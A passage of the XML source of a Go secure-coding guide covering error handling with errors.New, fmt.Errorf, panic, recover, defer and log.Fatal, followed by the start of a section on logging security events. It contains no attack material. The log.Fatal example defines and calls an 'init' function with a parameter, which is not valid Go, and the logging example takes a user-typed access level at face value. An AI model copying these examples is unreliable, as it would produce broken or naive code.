        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Not only can the built-in errors be used, we can also specify our own error types. This can be achieved by using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>errors.New</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function. Example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">{...}
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> f &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, errors.New(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"math: square root of negative number"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//If an error has occurred print it</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fmt.Println(err)
}
{...}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If we need to format the string containing the invalid argument to see what caused the error, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Errorf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package allows us to do this.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">{...}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> f &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, fmt.Errorf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"math: square root of negative number %g"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, f)
}
{...}
</w:t>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2"/>
        </w:rPr>
        <w:t>panic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>recover</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. When an application state is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>panic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> its normal execution is interrupted, any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> statements are executed, and then the function returns to its caller. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>recover</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is usually used inside </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> statements and allows the application to regain control over a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>panicking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> routine, and return to normal execution. The following snippet, based on the Go documentation explains the execution flow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main () {
    start()
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Returned normally from start()."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> start () {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> () {
        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> r := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">recover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(); r != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
            fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Recovered in start()"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        }
    }()
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Called start()"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    part2(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Returned normally from part2()."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> part2 (i </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">) {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> i &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
        fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Panicking in part2()!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(fmt.Sprintf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"%v"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, i))
    }
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Defer in part2()"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Executing part2()"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    part2(i + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Called start()
Executing part2()
Panicking in part2()!
Defer in part2()
Recovered in start()
Returned normally from start().
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By examining the output, we can see how Go can handle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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2"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usages also include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>Mutex Unlocking</w:t>
      </w:r>
      <w:r>
        <w:t>, or loading content after the surrounding function has executed (e.g. footer).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package there is also a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>log.Fatal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Fatal level is effectively logging the message, then calling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>os.Exit(1)</w:t>
      </w:r>
      <w:r>
        <w:t>. Which means:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Defer statements will not be executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Buffers will not be flushed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Temporary files and directories are not removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Considering all the previously mentioned points, we can see how </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>log.Fatal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> differs from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Panic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and why it should be used carefully. Some examples of the possible usage of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>log.Fatal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Set up logging and check whether we have a healthy environment and parameters. If we don't, then there's no need to execute our main().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>An error that should never occur and that we know that it's unrecoverable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>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5"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> init(i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">) {
    ...
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//This is just to deliberately crash the function.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> i &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
        fmt.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Var %d - initialized\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, i)
    } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//This was never supposed to happen, so we'll terminate our program.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
        log.Fatal(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Init failure - Terminating."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    }
}
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    i := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> i &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
        init(i)
        i++
    }
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Initialized all variables successfully"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>It's important to assure that in case of an error associated with the security controls, its access is denied by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="52" w:name="Logging"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Logging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>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12"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Input validation failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication attempts, especially failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Access control failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Apparent tampering events, including unexpected changes to state data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Attempts to connect with invalid or expired session tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>System exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Administrative functions, including changes to security configuration settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Backend TLS connection failures and cryptographic module failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Here's a simple log example which illustrates this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> buf bytes.Buffer
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> RoleLevel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    logger := log.New(&amp;buf, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"logger: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, log.Lshortfile)
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Please enter your user level."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    fmt.Scanf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"%d"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, &amp;RoleLevel) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//&lt;--- example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> RoleLevel {
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">:
        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Log successful login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
        logger.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Login successfull."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        fmt.Print(&amp;buf)
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">:
        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Log unsuccessful Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
        logger.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Login unsuccessful - Insufficient access level."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        fmt.Print(&amp;buf)
     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">default</w:t>
      </w:r>
      <w:r>
